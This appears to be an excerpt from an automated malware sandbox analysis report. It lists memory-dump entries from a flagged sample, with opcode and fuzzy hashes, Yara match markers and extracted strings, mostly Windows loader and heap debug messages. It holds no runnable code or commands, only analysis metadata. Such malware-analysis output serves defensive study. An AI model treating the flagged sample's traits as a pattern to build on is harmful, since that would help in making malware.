                                                                                      • Opcode Fuzzy Hash: fcdbaefdf3a6211f813b488f43a90fc53ad2f092ba9c8422e6b9be3118dcb61e
                                                                                      • Instruction Fuzzy Hash: E690023124104402D58171588514606009957D0249FD1D857A0414514ECA659A5EBA62
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 053ac417e37216330ebfaca2bd8197bbe33931b2ebd3872a22baa974d7d4beee
                                                                                      • Instruction ID: 0170f03bf0d6650ecd41a29a983064a467c589f7dedb948ab406cba805767786
                                                                                      • Opcode Fuzzy Hash: 053ac417e37216330ebfaca2bd8197bbe33931b2ebd3872a22baa974d7d4beee
                                                                                      • Instruction Fuzzy Hash: EE900221242081525985B1588514507409657E0249BD1D857A1404910CC936A85EE622
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 96fbc24f31df25ab085764bcdd03680453b89f35f820f8f6b11ad4da3a5ceb11
                                                                                      • Instruction ID: ce52ccb4652d8f72f9aa2c01154f383e6cfd05a698ca6805d68ae81f72ae3467
                                                                                      • Opcode Fuzzy Hash: 96fbc24f31df25ab085764bcdd03680453b89f35f820f8f6b11ad4da3a5ceb11
                                                                                      • Instruction Fuzzy Hash: CE90023520104402D9506158991464600D647D0309F91EC56A0414518DCA6498A9B122
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 066d4242372cdeaa4f2efe8bed8b1a097c13911afcbfbb003d54f5c573f3c66e
                                                                                      • Instruction ID: 582b51ba5f3f7688745340477ca86df3b3fb8c3b74611535bfbb8659b7a92412
                                                                                      • Opcode Fuzzy Hash: 066d4242372cdeaa4f2efe8bed8b1a097c13911afcbfbb003d54f5c573f3c66e
                                                                                      • Instruction Fuzzy Hash: F290022121184042D64065688D24B07009547D030BF91D95AA0144514CCD2598696522
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: HEAP:
                                                                                      • API String ID: 3446177414-2466845122
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • Actx , xrefs: 35577819, 35577880
                                                                                      • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 355777E2
                                                                                      • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 355778F3
                                                                                      • SsHd, xrefs: 3552A304
                                                                                      • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 35577807
                                                                                      • RtlpFindActivationContextSection_CheckParameters, xrefs: 355777DD, 35577802
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                      • API String ID: 0-1988757188
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      • Actx , xrefs: 35579315
                                                                                      • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 35579372
                                                                                      • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 35579153
                                                                                      • GsHd, xrefs: 3552D794
                                                                                      • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 35579178
                                                                                      • RtlpFindActivationContextSection_CheckParameters, xrefs: 3557914E, 35579173
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                      • API String ID: 3446177414-2196497285
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 35569854, 35569895
                                                                                      • LdrpLoadShimEngine, xrefs: 3556984A, 3556988B
                                                                                      • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 35569843
                                                                                      • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 35569885
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 3446177414-3589223738
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 355BEDE3
                                                                                      • ---------------------------------------, xrefs: 355BEDF9
                                                                                      • Entry Heap Size , xrefs: 355BEDED
                                                                                      • HEAP: , xrefs: 355BECDD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                                      • API String ID: 3446177414-1102453626
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: S5
                                                                                      • API String ID: 0-2861399667
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: $$@
                                                                                      • API String ID: 3446177414-1194432280
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      • Querying the active activation context failed with status 0x%08lx, xrefs: 35583466
                                                                                      • LdrpFindDllActivationContext, xrefs: 35583440, 3558346C
                                                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 3558344A, 35583476
                                                                                      • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 35583439
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                      • API String ID: 3446177414-3779518884
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: ^P5
                                                                                      • API String ID: 3446177414-1230844626
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: 0$0
                                                                                      • API String ID: 3446177414-203156872
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID: \Forwarders$\Forwarders\alt
                                                                                      • API String ID: 2994545307-1272641010
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: !S$&$($)$)$+$0x$2Z$5$=$Aw$B!$DR$J$K$Q$S$S$V$V$Xd$Y$[$\j$a$a~$b$b$da$g$j$pB$s$1$K
                                                                                      • API String ID: 0-1180571323
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 6$O$S$\$s
                                                                                      • API String ID: 0-3854637164
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ;T$U.!#
                                                                                      • API String ID: 0-1957567768
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: bTrB
                                                                                      • API String ID: 0-1577409840
                                                                                      • Opcode ID: 44416a8432de6e474aec5b11b022cfceea3b408eb5468c6438079f9494262c8b
                                                                                      • Instruction ID: b6ca50c3b2fa35febeb9e4c5e2ea9b75ed3d60d291bef909e54d4b28ab2c6e37
                                                                                      • Opcode Fuzzy Hash: 44416a8432de6e474aec5b11b022cfceea3b408eb5468c6438079f9494262c8b
                                                                                      • Instruction Fuzzy Hash: F151EABA14A695DBDF12CA78C8600D5BFA1FB5722072C11D9C9D15F623CB32A40BCBE1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7375021f1bc08ca1f26ce57d9fccb8d1876791fb91a093c2c4477ea6dd68e75e
                                                                                      • Instruction ID: 686c56340632e1e12838bd2111188a6a5514a2db95f9f0d8f68f38f1b5264259
                                                                                      • Opcode Fuzzy Hash: 7375021f1bc08ca1f26ce57d9fccb8d1876791fb91a093c2c4477ea6dd68e75e
                                                                                      • Instruction Fuzzy Hash: 7001DBB2D01219AF9B40DFE8D9409EEBBF8AE18204F14416EE919F2240E7715A048FA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4edda55ce172b60fa910730bd6b345c24a70decd6b2c01390df295fe35c320fa
                                                                                      • Instruction ID: 15c93178f4f2f4a170086c520520cba07d9ca53ad119f7655287ff71730ee8f5
                                                                                      • Opcode Fuzzy Hash: 4edda55ce172b60fa910730bd6b345c24a70decd6b2c01390df295fe35c320fa
                                                                                      • Instruction Fuzzy Hash: D0F0A7B36102166BEB105A5DEC45B86F7DCFB85339F240223FE6C87251DA72F451C2A4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 26bceb9c3be23a8c219c13decd2f61f5de1817fdaa7bdb3715a7f45e56d888e9
                                                                                      • Instruction ID: 227e748bda85dbe854ff1c9a79d27d0bc757e1d7dc4c2c7918c953f0e8b6fb09
                                                                                      • Opcode Fuzzy Hash: 26bceb9c3be23a8c219c13decd2f61f5de1817fdaa7bdb3715a7f45e56d888e9
                                                                                      • Instruction Fuzzy Hash: 2AF030B1B40104BBFB11DA54CC82F7A737CDB89A14F104299FA04DA1D4E6B1B91146A2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 35afc1af474eb9c1c955cf8ee66eb982e85963064d99355fa064fc9ca42809c8
                                                                                      • Instruction ID: e5e3eb7eab4bd0062ca2882204524244a4b576733e2a3779ee43db356a6c936b
                                                                                      • Opcode Fuzzy Hash: 35afc1af474eb9c1c955cf8ee66eb982e85963064d99355fa064fc9ca42809c8
                                                                                      • Instruction Fuzzy Hash: F6F0E9B1A182557AEF20AFE09C85D7B73B8EB58204F0001D5ED098B192D531EE458761
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8ac6c2b5893f55610fc12415c764ef17e557f8495f3409498e125e3ca549058a
                                                                                      • Instruction ID: 944c95533912e6285f8ff0859645e193d24bdd1c832f712989ff26006d2151fc
                                                                                      • Opcode Fuzzy Hash: 8ac6c2b5893f55610fc12415c764ef17e557f8495f3409498e125e3ca549058a
                                                                                      • Instruction Fuzzy Hash: A9F01CB6240249BBD710EF99DC81EAB77ACEFC9714F008419FA18A7241D670B9518BB4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c70116704e255d0889dfc3debcc1c7f33140e4e56f37c4381d7cd67408a62e67
                                                                                      • Instruction ID: acbce44c42702ea35db39ee63ddff0775db271b0398fe18ddb5b5b91fc247687
                                                                                      • Opcode Fuzzy Hash: c70116704e255d0889dfc3debcc1c7f33140e4e56f37c4381d7cd67408a62e67
                                                                                      • Instruction Fuzzy Hash: 8BE06D716002447BD614EE58DC85EAB77ACEFC9714F008418F958A7241C670B91087B5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7a9912697d821d139ba8690500d8e2fa140e2ba504739821949c4c6a163f1e7a
                                                                                      • Instruction ID: 2a4a96cdb3d17de5352cb319b33a243284bb4975bb75c7e95fea49bcf5fa2fa9
                                                                                      • Opcode Fuzzy Hash: 7a9912697d821d139ba8690500d8e2fa140e2ba504739821949c4c6a163f1e7a
                                                                                      • Instruction Fuzzy Hash: F6E0D873514216AB8B108E59EC848C7FB9CFE8A3353110323EA6C47551DB31F401C6E5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 943963aa0062aad987254ca54776de39da8556ff042d7ac3e0a6c1700e3a5f67
                                                                                      • Instruction ID: e09079e6b7cc47992c4e278eae1e23ac2a471707550cd730fc91c53ece2bee98
                                                                                      • Opcode Fuzzy Hash: 943963aa0062aad987254ca54776de39da8556ff042d7ac3e0a6c1700e3a5f67
                                                                                      • Instruction Fuzzy Hash: E6F08271915208EBDF14DF64D881BDEBBB4EB04320F10476DE8249B280EA34A7508781
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b4bec4b15cc9666143c1b8d56b095709b2f1ec30bb08cbb3d59eb3d4d3d149f2
                                                                                      • Instruction ID: fd33dcaad5a8135f3230de13b167f94b1bc455095c479be246fd7f44b91d8ab0
                                                                                      • Opcode Fuzzy Hash: b4bec4b15cc9666143c1b8d56b095709b2f1ec30bb08cbb3d59eb3d4d3d149f2
                                                                                      • Instruction Fuzzy Hash: F1E0DF3270022033D22066D98C06FA7779CCBC0BA4F0800A5FF099B301E278B80186E4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 71e583efc293f1664b149dfc91e6be398722987e6ad27d67abf4a710c331ad5f
                                                                                      • Instruction ID: fee345847e661b0b6b1449e51ee6d28d2308b1256de411dd8c19cc69108e5d48
                                                                                      • Opcode Fuzzy Hash: 71e583efc293f1664b149dfc91e6be398722987e6ad27d67abf4a710c331ad5f
                                                                                      • Instruction Fuzzy Hash: 7BE04632A412047BE220AB69DC41EEB77ACDBC6B18F508025FA1CA7241CAB0B90087B0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                                                      • API String ID: 0-3248090998
